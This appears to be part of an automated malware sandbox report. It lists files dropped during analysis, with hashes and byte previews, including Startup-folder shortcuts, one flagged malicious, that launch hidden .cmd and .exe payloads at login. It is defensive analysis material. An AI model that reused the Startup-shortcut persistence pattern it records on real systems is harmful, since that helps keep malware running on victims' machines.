                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.9.2.<./.P.i.

                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B42.tmp.xml

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4818
                                                                                                      Entropy (8bit):4.523347303106581
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:cvIwwtl8zsle702I7VFJ5WS2Cfjk+8s3rm8M4JYVNcSFFk+q8SCSPoqQUd:uILfs7GySPftfJak/LQUd
                                                                                                      MD5:B7B0C18498686D15BD435356775BE5AA
                                                                                                      SHA1:7096CA32A73FA10444B4808DDA5E5E02B19F73DE
                                                                                                      SHA-256:3228E9050A14EBFF0F6D6A0B6F2917F8C0BF3DB6E80CE874169E7D1C8AD0A828
                                                                                                      SHA-512:673D87D01DB011133954E2A6E5ECB78127E0B2113D8C26870B193BAB34274C3D4019F7DAE736DC602EC05AFC14EF5A7882B3DB2744044DA22648B7C922DDEFA8
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222904773" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):26328
                                                                                                      Entropy (8bit):5.049018369731122
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:rYtFDwKxtAHkUopbjoRjdvRoHWrxdH3KinHzwcSvqCwzYkvkaJfNeff:rYtFUKxtAHkUibjoRjdvR8WrxIinHzwp
                                                                                                      MD5:517F4284D3FF74BD76A7DEA9F2AA9681
                                                                                                      SHA1:6B9350F30744A23475BDAEE2D3DBEC58144BBD34
                                                                                                      SHA-256:2D9E4332820BC34DE4DC7A556486CC92677F39E572E684603173610BB7FCEAA9
                                                                                                      SHA-512:B923EBC947C4F82160FFAFD861BCDFB1D2B51841C93001995A08CCED67907C728DAF3DF1B96F76AD1F16876E872DB3A9DD066617D7053521FA1F46FE2D28F961
                                                                                                      Malicious:false
                                                                                                      Preview:PSMODULECACHE.'...E..F.z..K...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DnsClient\DnsClient.psd1........Get-DnsClient........Set-DnsClient........Get-DnsClientCache........Remove-DnsClientNrptRule........Get-DnsClientServerAddress........Add-DnsClientNrptRule........Set-DnsClientNrptRule........Set-DnsClientNrptGlobal........Clear-DnsClientCache........Set-DnsClientServerAddress........Register-DnsClient........Resolve-DnsName........Get-DnsClientNrptGlobal........Get-DnsClientNrptPolicy........Get-DnsClientNrptRule........Get-DnsClientGlobalSetting........Set-DnsClientGlobalSetting..........N.UQ..?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet............z..K...C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\PSReadline.psd1........PSConsoleHostReadLine........Get-PSReadLineOption........Set-PSReadLineKeyHandler........Get-PSReadLineKeyHandler........Set-PSReadLineOption......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3428
                                                                                                      Entropy (8bit):5.408200273959752
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:/AzlGHcIFKLdO9qrE7KfirJ5Eo9Adrx9Gdy:48HctdjrliLL2H
                                                                                                      MD5:972740E659582919F2CE349D97430589
                                                                                                      SHA1:5E5F9FA8F8B3DD8F108A1E4E6ABD4FD375E6A782
                                                                                                      SHA-256:60123F4CE8B435BE703707C27AAEAC6FFC121749767343478A7C33BCD87F5595
                                                                                                      SHA-512:D4665DBEBF882B0D4FDBFC95F89E87FCDD85DFF2E36A9E1A230A65B5EB315E01EEC97990DBACE0B794F8E889F57CCCF028604D0317252B52B7A2B386D6F858DC
                                                                                                      Malicious:false
                                                                                                      Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0...............I.....B..ZR............System..4......................A....E..........System.Core.D................g$H..K..I.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4...............F;7..C..f.G..........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..B........Microsoft.CSharpP...............

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):64
                                                                                                      Entropy (8bit):1.1510207563435464
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:NlllulXlglltZ:NllU1g
                                                                                                      MD5:24D987704F4C1B0B89FC9EED36B6C813
                                                                                                      SHA1:4232D5B0A29A72C36AFE31F95DFA8BF3159F4F83
                                                                                                      SHA-256:2A31FE2FA433CA93AC7D0F024C9ACDF9141699A63A05CF03DF39B23E80D0B779
                                                                                                      SHA-512:4A5EEAEFBFA74A8B1CF92B3169E7346CFFE7F7BE85A57A8C3E452920B305AC7E92FB0DDC0C653DE70EB203C6950FC10B649415E97CA08C7A9BBEB57219D4FD7A
                                                                                                      Malicious:false
                                                                                                      Preview:@...e................................................@..........

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qitb4ik.utm.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5wiwsnj3.adr.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blqdhdij.dyb.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnzpo32z.vty.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hoibnyb5.1gg.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kc0gc2oy.amb.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m24gtgkd.jnw.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oztbspws.bc5.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spj4h3id.ev5.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tjkvajs3.ge2.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ygthgct0.dsq.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zywqmgiq.4yr.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_V.lnk

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Icon number=1, Archive, ctime=Sat Oct 26 21:21:46 2024, mtime=Sat Oct 26 21:21:46 2024, atime=Sat Oct 26 21:21:46 2024, length=481, window=hidenormalshowminimized
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1130
                                                                                                      Entropy (8bit):4.662948895705751
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:8dbaQrRU4IeZcCHqXWxI5ACmUyKTJaXWjEjA+2wu4f/XKbOkvEMBSgkNvLGwZv4m:8bMGu2UZTgmUA5f43aDEMBSnvaSJTvm
                                                                                                      MD5:EC08BF2F6319354637EC5CFB2928307B
                                                                                                      SHA1:A048C2957E4C64B0A8B6FB7151FADAA823B79A06
                                                                                                      SHA-256:DBE7E3E634391AA090E27A236194211963338DB400538198D8011B9369E9D06A
                                                                                                      SHA-512:546C10CB12793237291745EF349F01473B40E16C5AC7D6296FB4756172F4A3F384514A6E5EEBC75E587505F42A5959174910BAA5416A4B0FDD3958981D2BDF61
                                                                                                      Malicious:true
                                                                                                      Preview:L..................F.... ......q.'..H..q.'..H..q.'...............................P.O. .:i.....+00.../C:\...................x.1....."S...Users.d......OwHZY.......u..............:.......8.U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1.....ZY....Public..f......O.IZY......Du..............<......5..P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....z.2.....ZY.. .W1064_~1.CMD..^......ZY..ZY................................W.1.0.6.4._.0.3._.k.j.f.e.c.h.8._.V...c.m.d.......U...............-.......T............WW>.....C:\Users\Public\computer_kjfech8_V.cmd..5.....\.....\.....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.W.1.0.6.4._.0.3._.k.j.f.e.c.h.8._.V...c.m.d.-.%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r.\.i.e.x.p.l.o.r.e...e.x.e.............!............v..*.cM.jVD.Es.!...`.......X.......061544..............n4UB.. .|..oXRb......E.P..#.....n4UB.. .|..oXRb......E.P..#.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VAA.lnk

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Icon number=1, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                                                      Category:dropped
                                                                                                      Size (bytes):549
                                                                                                      Entropy (8bit):2.9733182199850496
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:4xtU1xRcxPhKDhACKDjMLAmIKDhACqBtw4ACAACqBZ2bOlyvEMl4Yrlcdt/:8GHRcXKWiLAmIKWhE36h/2bOkvEMBi
                                                                                                      MD5:25D62C08509B6F5A2A234895DD7F9531
                                                                                                      SHA1:29666F5CE912D83EB4CBE9026568592D946B121B
                                                                                                      SHA-256:F74453C9DD7089B0D4FE3F19E023A8DAE8A3B325F626C81C77FF9D95C0918666
                                                                                                      SHA-512:539CFC561ABE16C31EBA6BA602B19BD6A77917ED0DD5609B905A38CFF5170C055059AE40B3889A3892D7704D8205F5D63044475F0605995CC4CDE231FBF9C27D
                                                                                                      Malicious:false
                                                                                                      Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................`.1..........._kjfech8_V..F............................................_.k.j.f.e.c.h.8._.V.....r.2..........._kjfech8_Vi7.exe..R............................................_.k.j.f.e.c.h.8._.V.i.7...e.x.e... ...6.....\.....\.....\.....\.....\.....\.....\.....\.....\._.k.j.f.e.c.h.8._.V.\._.k.j.f.e.c.h.8._.V.i.7...e.x.e...C.:.\.-.%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r.\.i.e.x.p.l.o.r.e...e.x.e.....

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VAT.lnk

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                                                      Category:dropped
                                                                                                      Size (bytes):617
                                                                                                      Entropy (8bit):2.9973063303812637
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:4xt2/b12RcxPhKDhACADjrmhACFAtM4ACAACFAjEbACyACAAC5UrbOlyvEMl4Yri:8wb4RcXKWL9EZ36EKEsI64gbOkvEMBi
                                                                                                      MD5:FF10667B4DE352B43BDE9FF5E7D851B2
                                                                                                      SHA1:EF53D29B6542E0571B43613B3AC183617D804184
                                                                                                      SHA-256:799F9DCBC3DB2B437DA52DA2C0A9928694BFE9B6DC6F62BD1F39C85A01E92D41
                                                                                                      SHA-512:16CC6EB7530D61A06DCE9B05540E86E44D13B12E997755FCDFD8CAB18BA16FF10B2F3521EFFEC7F7E3911DDFAB0564184B2B97AD8619B1C67E34BB5A4F904711
                                                                                                      Malicious:false
                                                                                                      Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................`.1..........._kjfech8_V..F............................................_.k.j.f.e.c.h.8._.V.....l.2..........._kjfech8_V.exe..N............................................_.k.j.f.e.c.h.8._.V...e.x.e.......4.....\.....\.....\.....\.....\.....\.....\.....\.....\._.k.j.f.e.c.h.8._.V.\._.k.j.f.e.c.h.8._.V...e.x.e...C.:.\._.k.j.f.e.c.h.8._.V.\...C.:.\._.k.j.f.e.c.h.8._.V.\._.k.j.f.e.c.h.8._.V...a.t.-.%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r.\.i.e.x.p.l.o.r.e...e.x.e.....

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VEX.lnk

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                                                      Category:dropped
                                                                                                      Size (bytes):617
                                                                                                      Entropy (8bit):2.996511800404485
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:4xt2/b12RcxPhKDhACADjrmhACFAtM4ACAACFAjEbACyACAAC5TBbOlyvEMl4Yri:8wb4RcXKWL9EZ36EKEsI64TBbOkvEMBi
                                                                                                      MD5:E0F4813BC49568FD0575A24C54F79F1C
                                                                                                      SHA1:454E93B73AAA189889A34D0F490981AB9BFDBFCC
                                                                                                      SHA-256:823DB2B0FFAA5C69761E8FAEA7D548279D1C48E38B8FC05F44C355D8D1A9A785
                                                                                                      SHA-512:DFD5C21880B77A02D30180DF7352757D79E960829AEFBBAD7F3C30956667C57B8B8687DB6D4D12AAF8C7EB0BE9CE61A09DF2C7D42DAA8ACEA911A770999D2FE7
                                                                                                      Malicious:false
                                                                                                      Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................`.1..........._kjfech8_V..F............................................_.k.j.f.e.c.h.8._.V.....l.2..........._kjfech8_V.exe..N............................................_.k.j.f.e.c.h.8._.V...e.x.e.......4.....\.....\.....\.....\.....\.....\.....\.....\.....\._.k.j.f.e.c.h.8._.V.\._.k.j.f.e.c.h.8._.V...e.x.e...C.:.\._.k.j.f.e.c.h.8._.V.\...C.:.\._.k.j.f.e.c.h.8._.V.\._.k.j.f.e.c.h.8._.V...a.i.-.%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r.\.i.e.x.p.l.o.r.e...e.x.e.....

